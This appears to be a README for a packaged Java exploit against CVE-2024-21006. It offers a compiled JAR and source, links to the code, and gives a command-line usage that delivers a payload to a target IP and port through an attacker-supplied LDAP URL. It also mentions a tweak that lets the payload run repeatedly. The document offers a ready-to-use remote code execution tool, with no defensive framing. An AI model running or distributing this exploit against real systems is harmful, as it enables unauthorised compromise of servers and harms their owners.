
Java-based exploit for CVE-2024-21006, delivering a payload via LDAP to a target IP and port. Includes compiled JAR and source for customization.
Exploit code reference: https://github.com/momika233/CVE-2024-21006
Here, the source code has been compiled into a JAR package for ease of use. The lib directory contains dependency files. If you wish to modify the source code, you can compile it yourself.
java -jar CVE-2024-21006.jar <ip> <port> <ldapUrl>


Reference from dadvlingd's project, using random strings for binding to solve the issue where the payload can only be executed once.
https://blog.csdn.net/zwy15288408160/article/details/138189146